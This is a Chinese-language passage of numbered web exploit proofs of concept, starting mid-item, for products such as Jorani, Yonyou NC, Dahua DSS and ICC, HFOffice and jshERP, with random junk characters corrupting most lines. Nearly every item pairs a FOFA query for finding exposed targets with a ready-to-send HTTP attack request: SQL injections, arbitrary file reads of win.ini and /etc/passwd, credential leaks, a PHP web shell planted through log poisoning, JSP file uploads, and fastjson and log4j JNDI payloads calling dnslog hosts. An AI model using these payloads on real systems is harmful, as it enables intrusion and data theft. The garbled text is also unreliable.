: c! V o" n: N: d9 R zGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1/ g, q/ h" O- N6 a+ _+ @
Host: 127.0.0.1+ o/ i! m1 O0 A* I) f6 @/ n$ Q
Pragma: no-cache! \) p" ^/ S2 B G0 R2 \
Cache-Control: no-cache4 j1 X7 `- ~7 t# R) s1 G
Upgrade-Insecure-Requests: 1
' Z4 O% W) N" s8 j" E% xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36: [0 H+ T, T" I! ?2 x0 I1 H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' d Z0 ]/ K0 \4 }8 z3 r
Accept-Encoding: gzip, deflate
2 v% a, I5 \8 G8 X' ?; eAccept-Language: zh-CN,zh;q=0.9,en;q=0.83 m" X6 V, i5 n9 `, s* |' |
Connection: close3 ]% F/ j5 _8 Q& E4 ]; A2 ~
0 {+ r& q9 ^9 U+ S. a6 j
# K# d* N% P" q. W0 m5 ^12. Jorani < 1.0.2 远程命令执行7 O# m w, B Z0 t9 e
FOFA:title="Jorani"
3 Z! r, ^- y4 ~* m第一步先拿到cookie5 w3 X b2 {4 G( u! s
GET /session/login HTTP/1.1# V7 }3 |: `) w4 ]1 \
Host: 192.168.190.30
" u, i2 A8 l+ _# L HUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
: }; n4 ?. s, `0 A% d# E1 G9 CConnection: close0 |! g7 ~6 q2 h; i! ~
Accept-Encoding: gzip
: r& T& b6 a k# j2 G5 {
8 E: q2 U+ Q$ Q1 d1 n5 P9 c' }7 R4 x. \3 {
响应中csrf_cookie_jorani用于后续请求" O! i$ U6 S0 X; S2 p
HTTP/1.1 200 OK4 Q- l9 W- z& `" \; P" S# C- @6 [
Connection: close* t3 V# t6 }. a9 T# C: i$ o
Cache-Control: no-store, no-cache, must-revalidate
$ L3 o6 Q4 f3 t9 Q' S3 W4 bContent-Type: text/html; charset=UTF-8. L. V8 f! }/ C% Z1 |
Date: Tue, 24 Oct 2023 09:34:28 GMT
6 z. ]* Q4 p) z6 FExpires: Thu, 19 Nov 1981 08:52:00 GMT; k. {+ r9 T/ p+ E+ h7 g
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT, e! B4 D5 M. E6 h( { b
Pragma: no-cache) e- b/ r4 |1 M- d: m; F
Server: Apache/2.4.54 (Debian)% l0 c: U- c6 v; C
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/ @: ]; K! R; X5 R0 }2 t
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
. [* J @: k/ }# a' @Vary: Accept-Encoding
- _7 }9 n% R) k- k4 p
7 N" ~! o' P2 J4 y( E7 I- e7 J& _2 [" L! }* [2 }5 d7 h5 n" [ K$ q
POST请求,执行函数并进行base64编码- C" c2 M8 ?& y+ @5 D" s
POST /session/login HTTP/1.1% n! r9 @$ w, {1 Z( X& j
Host: 192.168.190.30( E& }8 W& j) \1 l
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
# f c4 J9 Q7 w* b) t1 I5 `% ]5 X3 jConnection: close
0 o ?$ v+ Y6 \3 I9 J% Q/ \Content-Length: 252# b1 X" X6 r* x% Q' E" L$ a
Content-Type: application/x-www-form-urlencoded
, u3 Z7 v. o& l6 ~Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
; D4 {% H' E. \3 j% a* N9 ?5 RAccept-Encoding: gzip2 x! ^# ~+ `5 z; a+ ?; i7 e
* N% o% c# B/ H: H. i( m1 D; z" t
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor/ f0 h5 n: D( A' I- C7 P; F m+ M
2 z, U+ r+ W" U* ]; J9 D
# `6 t! M T. J
$ }& Z! e7 O+ T4 R3 `$ G" l# s; G0 l
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
5 ~) d7 b/ \4 T& D6 X0 H. `- sGET /pages/view/log-2023-10-24 HTTP/1.1
) x% W$ I I5 P& VHost: 192.168.190.30
" c' I9 N" ~" aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
& B2 @% g; Z: `2 L$ uConnection: close3 ~# W: }/ R7 y# ]% L
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
/ w B8 [/ s& BK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=2 K; t4 }3 J- I% f- J, n# w
X-REQUESTED-WITH: XMLHttpRequest. U- o0 z" {4 h+ J1 h9 o3 {1 n' h
Accept-Encoding: gzip1 u/ h9 g7 ~3 b* K$ X# m5 A
4 g+ Q. L# ~ k/ ?% }" N
% l1 r1 Z0 a! O3 G1 t13. 红帆iOffice ioFileDown任意文件读取
. X, V" {# _* P$ @" H KFOFA:app="红帆-ioffice"
5 {. S* V% D8 `GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.14 x! N( A$ M, B0 k" _& {" D
Host: x.x.x.x2 f i7 o( A9 q( E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36* y% j+ `4 k) c" S
Connection: close
" l+ s7 T+ I3 d4 U2 h6 |' }2 mAccept: */*
8 o$ R) }% V2 ?Accept-Encoding: gzip5 r3 @" c9 d9 x9 o& Y" |
, m% S( w7 W5 u5 ]" E7 b% }4 q
* v9 w& k+ `0 g14. 华夏ERP(jshERP)敏感信息泄露$ S$ h( k: o( @4 J
FOFA:body="jshERP-boot"
2 ]8 v/ S4 v+ x8 E泄露内容包括用户名密码+ A" y7 n B6 `! P0 Q
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
! P+ [: I$ U( Z. H6 mHost: x.x.x.x
0 A4 s& y8 C2 r# K6 L# yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.362 W3 L1 n/ v4 i: T) _. X
Connection: close
& A, h& j& P, lAccept: */*
) m6 \; @. z9 f4 Q7 p6 v1 A& N1 p) b) zAccept-Language: en: ]* s! z1 {2 Q5 n+ }4 a9 Z
Accept-Encoding: gzip
G) c; L) T1 I9 H5 B
6 V+ t4 i; v* D: J4 F0 r" C @9 m- }, x: A% V# K! r3 l7 n6 \ u
15. 华夏ERP getAllList信息泄露( N7 j, o& A1 i8 A* ]: z( `2 U
CVE-2024-0490
& t0 O: R, M6 l1 F2 hFOFA:body="jshERP-boot"$ T t) s% G# S% ]
泄露内容包括用户名密码
6 L+ `2 |, K2 U5 y6 s- WGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.18 c4 x# \7 \- b# {- \6 v
Host: 192.168.40.130:100" K0 _! z5 L/ w' R- C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.368 m. f# M* O# M& q* a) D; \
Connection: close
/ h( c+ G1 r6 R' I2 g7 I# lAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
' Q, Y, l( M$ l* n# a1 s1 tAccept-Language: en1 g" h+ y. L7 }
sec-ch-ua-platform: Windows
0 i. b! {% O) R9 ~Accept-Encoding: gzip9 b1 G- O F( O% ], X! r
4 O4 j5 m% H0 V& v# l
- O* M1 d& w. q/ V3 E9 U16. 红帆HFOffice医微云SQL注入* Y0 |; @7 T1 I3 h6 _/ X
FOFA:title="HFOffice"3 ^1 ~1 Z+ m3 [. d' v/ Z2 e
poc中调用函数计算1234的md5值- g0 b1 Q# O+ \/ V: y- Z/ }% p7 q7 L
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
2 M9 Y3 o5 a+ d. \7 \$ Y, Z" w. IHost: x.x.x.x
3 }1 u; ^' P# Y/ `User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
1 \$ ^+ G" ~# h; d% \Connection: close( |) e9 `1 y* L/ K; z; ~, w1 V
Accept: */*' v# x$ j4 z# n, _3 a
Accept-Language: en
( |0 F3 Z; g1 m6 x YAccept-Encoding: gzip, P R: l* I5 n( r
1 U% ?+ a1 H E+ j+ s5 L2 `0 w
: B' J$ K) b* Z6 x, y; u' b
17. 大华 DSS itcBulletin SQL 注入
9 h# Q+ K( X6 t/ X# pFOFA:app="dahua-DSS"
/ K, w* u$ [7 xPOST /portal/services/itcBulletin?wsdl HTTP/1.1+ Y8 P' w: \+ t/ u0 p1 b1 }* l
Host: x.x.x.x& ]6 t! a% d# ^' L5 y2 [5 [+ I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, d' v+ i! ]+ i8 DConnection: close
- p' l% ?( ?' Z4 G2 `2 I2 eContent-Length: 345
# u, z; T$ [- \# T5 j+ ~$ lAccept-Encoding: gzip
) D" [+ n9 o0 i8 c1 N
, ^1 K% x& W2 T" N& ^. K4 g<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
3 r5 [/ i! d2 l) Y+ t<s11:Body>
) B4 M& O- ~' |, S <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>* n: `* e! f2 Y' @
<netMarkings>4 q: ?, y9 x* T
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
" b: z; Y9 \) | </netMarkings>9 Y! t3 `$ |: O4 z
</ns1:deleteBulletin>
$ ?- K' j; O, N+ L </s11:Body>
$ I7 m2 J3 [0 t: K3 |( Z* j: q</s11:Envelope>
3 S$ [0 N$ ]3 _+ n
/ ^2 ]4 K* _1 p) h% R/ d4 t1 e/ N. b' s3 R5 \! _
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
3 ?2 i: f0 X" TFOFA:app="dahua-DSS"
, d# B' ` k& w3 K- WGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
?. s/ G2 }, L: tHost: your-ip( z- F3 x ~* r' z1 U, v$ I7 `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 ]! m; D4 I2 W; U) ~1 V8 {
Accept-Encoding: gzip, deflate0 Z1 K, c8 Z8 S' W1 x/ j
Accept: */*3 ]. `5 w8 m( W1 H; ?5 o F" t
Connection: keep-alive6 q7 k* L H; B; t4 g
& Y4 X1 `; @+ {& r: H& G
/ v% G# _! s; A0 d$ @9 ~7 H2 `5 U) _7 v# l' z2 v; ]
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入1 x0 i4 O9 x4 U
FOFA:app="dahua-DSS"
8 s3 Q, y* z& p# a: ~GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
8 W/ Y9 d& V( x k7 e4 I. {9 mHost:8 T: X$ _# ?, E! x$ Q! B" i. n
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.368 Y# R1 i9 y5 Q
Accept-Encoding: gzip, deflate2 ?- C4 w! H9 Y
Accept: */** S1 `" u/ a2 f+ g
Connection: keep-alive
4 H. J/ c2 f& w' [. p
# I# q/ Z7 Y/ O+ P
0 n7 E1 k& v# d9 A8 u: t7 k6 H20. 大华ICC智能物联综合管理平台任意文件读取
" b w& \ E1 c1 mFOFA:body="*客户端会小于800*"
) c5 s" A% v/ dGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
& b: _! l s! lHost: x.x.x.x
+ e+ o( K& h$ [/ m$ H' a# B7 NUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
% l$ |0 D( @5 C7 sConnection: close& {' f" ]& O) X
Accept: */** B: q7 L; F1 u& G7 z
Accept-Language: en2 |0 F0 G9 Y1 c6 s+ `9 J
Accept-Encoding: gzip
& c R) f/ M6 G6 e# t, j7 U# V% |* g* T% u. u- Q* t% }, @
; U( t2 |; _2 A( t/ b6 c/ z2 p ]9 `
21. 大华ICC智能物联综合管理平台random远程代码执行
8 p' B% N: T1 {4 e+ D+ [FOFA:icon_hash="-1935899595"
- K6 F# Y( ^, n# X" a! jPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
J% m1 w0 V# X7 e0 e' P7 hHost: x.x.x.x
: g5 A+ F8 m @. j. J6 oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% A: @1 t3 L5 K% |; e1 `
Content-Length: 161 ^, ?, Q6 v5 w' }: `
Accept-Encoding: gzip
4 j. ], T- [- @. W$ F1 dConnection: close+ Y; W+ |* T9 f( D# f3 ?4 w
Content-Type: application/json;charset=utf-8) r+ Y# @# N3 }2 c$ e
: R/ {' {, E7 G M+ G$ ?/ C$ o{ U1 {7 z7 ^5 f7 y
"a":{
" `, h2 r- _6 C9 C: P "@type":"com.alibaba.fastjson.JSONObject",5 \) i, ^$ [$ d; q, ?7 V( x
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}) R, ]! R( m4 M
}""& c7 K! `' l- G$ J9 r# o. ]* u
}$ B8 p6 f* N6 o1 f' H1 W
# I* e1 [; u+ l. j F
+ m5 C: o' s' M* G; ~8 Y) v22. 大华ICC智能物联综合管理平台 log4j远程代码执行2 a q8 P! \+ H6 J4 r4 k% `( N
FOFA:icon_hash="-1935899595"" _1 c$ V2 t/ }
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1, u; i, W1 F/ G
Host: your-ip
2 P; t! ^8 q) h7 F. R& pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
" q$ V8 T' l0 S7 AContent-Type: application/json;charset=utf-8+ R1 p8 N) P6 `: t! j$ J
) y! U1 \7 D* F* h9 G{
a1 F4 t: q! U6 Q0 P4 ^"loginName":"${jndi:ldap://dnslog}"7 w' q7 i" ^, {; ]' y- b1 @$ f5 C
}
: L( j6 f& R) x7 n! j$ m* ^" p4 z6 f0 \( X. w4 Z- f1 ]
7 f8 x' `! ~6 r; G* n$ n
, m, o" H& f3 J' X7 {& H. v0 K
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行1 T' Q( V6 J! w! G U2 d8 v/ f
FOFA:icon_hash="-1935899595") A' ~1 {8 C* l
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1% C, L" m# k' e3 _+ b& A" P5 |: r$ J
Host: your-ip
. I0 y3 e# J6 N# \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.156 {9 ], d$ y4 f3 y6 ]' Q( D0 h
Content-Type: application/json;charset=utf-8
! ?! [6 C# x1 L& C+ t4 f3 \/ o& r- [4 h# fAccept-Encoding: gzip8 q7 ?; v3 }8 o' |
Connection: close
4 R1 j( j3 _, {& l* F! G& `4 m" ]- F+ {* Y1 p
{+ x2 d, K: {( ? \: r4 @2 \
"a":{
|: Y9 P3 {: Q: p$ M" L "@type":"com.alibaba.fastjson.JSONObject",3 }' h' T7 s2 W& k+ o" u
{"@type":"java.net.URL","val":"http://DNSLOG"}
% w; S6 _3 Q, Y8 E3 u }""
, p% h) H* P9 h/ c}. N( W, S" S& E2 x/ ?( Y
- i: A- K* b7 j, z& p
5 F5 ?' I, P0 H$ Z; T& a
24. 用友NC 6.5 accept.jsp任意文件上传
4 I9 \; f/ Q. H. E9 [& Q+ kFOFA:icon_hash="1085941792"
9 n* \5 Q1 A/ K" v' X7 k6 DPOST /aim/equipmap/accept.jsp HTTP/1.1
& y, ]0 \3 x8 d: P* VHost: x.x.x.x, W0 K: B4 z' P, B4 t3 p
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36! p6 T+ D- C3 `* ^
Connection: close
) t! z0 t A- J: y6 MContent-Length: 449. j/ _8 ]. n! R; _* @
Accept: */*1 o r8 S3 y% ~
Accept-Encoding: gzip5 U8 R( u1 P1 w. A$ o
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
" k( T4 L+ B: k# [/ h
, n: y3 U- g3 v( {2 `-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc- z( J. f5 ?" }/ U i8 O
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt" u6 B. i" h- t9 g% i0 e/ K$ P* I
Content-Type: text/plain0 `) f) {5 `+ }; Q B0 ^
) g- g7 V: p5 f) @$ O, C9 ^" I
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>& K3 T7 \) Z. m6 b6 ^, W+ _2 |$ T
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc5 G7 y8 Z" Q+ t C& h1 p
Content-Disposition: form-data; name="fname"3 c: S" q" [$ E A& ^0 Y. L5 M' N; a
6 l& Y' Q1 H8 r& m2 u% t
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp% C( O: S2 ^( d
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--: i7 I, D5 {" Q, R$ v3 [0 ]/ X
" U- P0 i' R/ _3 ]( d8 h
' N6 h8 w. L0 T/ o$ ^3 c25. 用友NC registerServlet JNDI 远程代码执行% D, Z* J; b: m; N
FOFA:app="用友-UFIDA-NC"
9 x. D+ n, W. m' p. APOST /portal/registerServlet HTTP/1.1
% {/ Z2 i( r8 Y) B! BHost: your-ip
1 p" k9 O9 w# G7 b9 OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.08 z6 i2 h- {' \$ A w4 i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
1 |, ~7 i7 e+ jAccept-Encoding: gzip, deflate# t# l1 j6 e5 j
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
8 U" G6 r) P, N3 H' f( ~; SContent-Type: application/x-www-form-urlencoded
4 C6 P0 y: `, [7 x. t( |
! U# Q4 U: p6 J$ E8 \type=1&dsname=ldap://dnslog
; H& r! S4 |# J- r8 o! J0 a- o! Z R* ~. w7 B( V" g4 V) o2 W
+ j4 S5 A) I. h8 c
) V( ^( G) C& d/ Q. q7 S) k26. 用友NC linkVoucher SQL注入
. ~- P6 ]/ ?) |1 U1 W% \. |: tFOFA:app="用友-UFIDA-NC"
* n8 W+ F' Q" |% R( n- q# ^) W" q# t7 @GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
5 U/ [5 P' J4 p9 zHost: your-ip
6 G# y/ Z! C/ `0 C3 D. r1 \% L3 B. zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 J+ p7 V; k. E( ]8 o
Content-Type: application/x-www-form-urlencoded
* r: B' ]8 m6 l2 }3 |) Y: GAccept-Encoding: gzip, deflate
7 [7 b2 `& V$ M: t! XAccept: */*. R2 G e" A3 W! v
Connection: keep-alive
6 F& I) E" y+ N7 Y
( H: R# ?& y2 e, h; J W U/ `- Z2 y! [% Y7 E+ Q' i- z
27. 用友 NC showcontent SQL注入
6 H2 b% [# n' x, T2 l) M( {FOFA:icon_hash="1085941792") m$ }; h' p7 v
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
0 n. M% ~2 t0 A. W) R0 d1 Z# cHost: your-ip
: b* U! n L, _# P }$ aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 @4 N% |! K6 O0 x% LAccept-Encoding: identity1 B. Z( _" Y) X8 `: {2 C# ~
Connection: close
6 ]0 {* p1 C |Content-Type: text/xml; charset=utf-8! C/ J% d, W! _6 M* V; [# E
Y. K. r$ f1 B. S6 ]1 a$ u' l
. E" s) q) e6 ^! l
28. 用友NC grouptemplet 任意文件上传1 g- S% ^& u( O- ^+ E
FOFA:icon_hash="1085941792". }+ G1 N. F" m3 m! u+ d' t7 B, c
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
! e) e, A0 L4 M, pHost: x.x.x.x( L- W% b) A+ M4 G, d8 }5 ^' S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.360 k+ F! i2 X# ]; T. I% [) p
Connection: close; J( O- |$ [, P7 @1 U% \7 A
Content-Length: 268$ J7 e# q( r2 m7 C7 p( I+ G# X/ d
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
w) ]) \. Q/ I+ mAccept-Encoding: gzip
5 f) l7 z. U5 J7 W* L! }! C- d$ \% E
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
. B+ a5 O; W7 vContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
3 `! i: _) [8 x+ uContent-Type: application/octet-stream% }) j5 d5 x. y% v4 s# i
6 M* x$ X: c0 `) y; b, S4 |<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>) m v6 N* {. E- k( V+ n0 B
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
$ J& k j0 u0 E! c* y' h& y# e7 X0 f3 r& i; z# p
9 K- c# E* Z% ^, C( ]4 c
/uapim/static/pages/nc/head.jsp
6 v+ W5 ^% ^* E4 v7 ^& Q" h* d! {- g9 @ i1 S; x1 A. Q
29. 用友NC down/bill SQL注入
/ X4 a) D( k! p1 _/ FFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"$ \+ i9 k4 g$ }/ n
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.12 i5 r! z5 D8 p8 O2 }: P
Host: your-ip
- @* _* ]" r- o3 ]& KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
" ~: w5 Z, R' y. }% CContent-Type: application/x-www-form-urlencoded
$ R2 Q) G6 p% ^2 a( Q2 YAccept-Encoding: gzip, deflate
0 b4 X! \6 E2 k2 p5 y& k3 CAccept: */*1 f: {& x8 E/ C$ ^7 |
Connection: keep-alive$ q' j; d l S' w
+ j( y$ p9 G) s/ N `) n
" [# i) O' D h0 q30. 用友NC importPml SQL注入9 i# W s; ^/ j
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif", }7 T; m/ L1 u. W- v; o6 g
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1% z! ~) C# r. }( ?+ P
Host: your-ip
6 x) n# Z. x# |+ f, tContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V/ r$ L4 E6 I6 s. ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.362 Q: q" y0 I0 Y- a
Connection: close3 B+ b& s: z- x+ Y% Z
/ _" c/ E: M5 H/ ~/ i+ k8 O
------WebKitFormBoundaryH970hbttBhoCyj9V- e& {4 B/ d* _ w6 s
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"+ c0 a/ J( r2 E
Content-Type: image/jpeg9 w1 Z a/ c: R0 G
------WebKitFormBoundaryH970hbttBhoCyj9V--6 S0 w* z+ s! a( Z- l0 B
6 v, H1 `& ~) |- Y6 h/ _! {6 x
4 a6 I$ O/ `1 e3 V31. 用友NC runStateServlet SQL注入4 _% K, c- E7 Y4 T8 Q: p6 b# [) e
version<=6.5- M6 g) a+ l8 e0 r; f6 g/ M+ n
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"! u- }6 { d! y# i/ |; j! m
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
" Z% T, n# ~( r( e/ U" SHost: host
x( u7 R) }$ {9 S2 kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
9 D* i6 E# p, u+ e0 JContent-Type: application/x-www-form-urlencoded3 P3 Z5 n1 _. r2 K7 U
s% D( S5 {+ L" o9 E
5 j4 [7 e+ i4 B+ b0 h: x32. 用友NC complainbilldetail SQL注入) L$ U, @" c* j: ~0 ^
version= NC633、NC65
' ]3 D% [6 y2 H& }FOFA:app="用友-UFIDA-NC"4 G9 f5 ^5 [7 H
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1$ t8 x; I( K% j0 r1 p' A
Host: your-ip
& z: X4 z+ b" c. H. M+ {7 H) oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- J( a x( Y7 b
Content-Type: application/x-www-form-urlencoded
$ C2 [4 S* w( h' tAccept-Encoding: gzip, deflate9 D9 o1 ^( |) F
Accept: */*) A c) I% K0 R# ~8 X6 ?4 R
Connection: keep-alive
7 L' Y# ^: w; s& ^/ W8 |, @ X: ~: [4 @: F! [
/ \" M$ i$ g5 A# |. s' h
33. 用友NC downTax/download SQL注入8 X0 l6 B' c0 M# f c& Q! I
version:NC6.5FOFA:app="用友-UFIDA-NC"1 f0 X/ z3 i. X/ n: G
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
7 I2 F4 O4 s) C5 M! q' q8 H/ s: nHost: your-ip7 w4 N; ?! l+ V- r9 l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 [* h! O) p& a& k' T
Content-Type: application/x-www-form-urlencoded, z, S7 p+ t$ h4 J5 O2 |" g. d
Accept-Encoding: gzip, deflate
6 m# u: M, N; f2 v {9 y( X4 XAccept: */*
9 o3 b8 q. r7 `! F9 |7 _. ]. ~/ VConnection: keep-alive
/ r: b( y6 E7 y- q* S: I
9 a2 V8 L T. B( Y" W/ c$ D$ ~) t5 q" b, X9 Y6 K
34. 用友NC warningDetailInfo接口SQL注入
( f9 ^+ H0 }# {. Q' S! @0 a8 m$ P/ EFOFA:app="用友-UFIDA-NC"0 r5 t1 w3 D. P2 r
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1# X1 ?, y( r# I0 p& a, k
Host: your-ip* r, k) @5 c0 e2 j, B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
) W5 s& d9 i# {1 T, Z; q5 B% ZContent-Type: application/x-www-form-urlencoded; B6 u) `2 O% ^; K
Accept-Encoding: gzip, deflate2 r6 q: [) u' U: m# v: p
Accept: */*4 L& L' f$ |* k. {: r1 x1 a: Y* X
Connection: keep-alive, X7 Q1 P+ \# R! i% a1 v' y
. ?' ]8 i% ^2 |: s+ S
